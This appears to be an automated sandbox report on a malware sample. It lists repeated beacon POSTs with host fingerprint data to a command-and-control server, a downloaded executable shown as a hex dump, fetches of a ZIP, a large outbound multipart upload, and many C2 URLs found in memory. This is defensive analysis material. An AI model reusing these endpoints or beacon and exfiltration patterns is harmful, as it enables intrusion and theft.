                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Sep 2023 04:01:54 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Tue, 26 Sep 2023 23:39:09 GMTAccept-Ranges: bytesContent-Length: 494080Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 64 9b bb 2d 20 fa d5 7e 20 fa d5 7e 20 fa d5 7e 94 66 24 7e 33 fa d5 7e 94 66 26 7e 87 fa d5 7e 94 66 27 7e 3e fa d5 7e 29 82 51 7e 21 fa d5 7e be 5a 12 7e 22 fa d5 7e 8d a4 d6 7f 3a fa d5 7e 8d a4 d0 7f 1a fa d5 7e 8d a4 d1 7f 02 fa d5 7e 29 82 46 7e 39 fa d5 7e 20 fa d4 7e 1d fb d5 7e 95 a4 dc 7f 44 fa d5 7e 95 a4 2a 7e 21 fa d5 7e 95 a4 d7 7f 21 fa d5 7e 52 69 63 68 20 fa d5 7e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f a4 f9 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 72 05 00 00 14 02 00 00 00 00 00 3d 49 03 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 08 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 ee 06 00 04 01 00 00 00 90 07 00 90 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 bc 3b 00 00 40 d3 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 d3 06 00 18 00 00 00 78 d3 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b5 70 05 00 00 10 00 00 00 72 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 79 01 00 00 90 05 00 00 7a 01 00 00 76 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 5d 00 00 00 10 07 00 00 0e 00 00 00 f0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 70 07 00 00 02 00 00 00 fe 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 30 02 00 00 00 80 07 00 00 04 00 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 48 00 00 00 90 07 00 00 4a 00 00 00 04 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 3b 00 00 00 e0 07 00 00 3c 00 00 00 4e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: GET /solonichat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                                Source: global trafficHTTP traffic detected: GET /40eaa63b296d256c2181f079611d421f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333
                                Source: global trafficHTTP traffic detected: GET /temp.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9212820331509204User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333Content-Length: 131333Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficTCP traffic: 192.168.2.3:49801 -> 81.19.131.36:2450
                                Source: global trafficTCP traffic: 192.168.2.3:49810 -> 116.202.2.169:1333
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.169:1333/
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.169:1333/40eaa63b296d256c2181f079611d421f
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.169:1333/T
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.169:1333/al
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.169:1333/t
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.169:1333/temp.zip
                                Source: yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.0000000001582000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9
                                Source: yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9-k
                                Source: yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9g9ecOb3jd/index.php
                                Source: yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.php
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.php(
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.php1
                                Source: yaALNupJCH.exe, 00000000.00000003.945842153.000000000157A000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.945829879.000000000156A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.php9
                                Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpE
                                Source: yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpRs
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpU
                                Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpVg
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpY
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.php_
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpatch
                                Source: yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpespace
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpff.info5
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phph
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpion
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpkernelbase.dll
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpn
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpq
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpspace
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phptch
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpv
                                Source: yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpx/svchost.exe
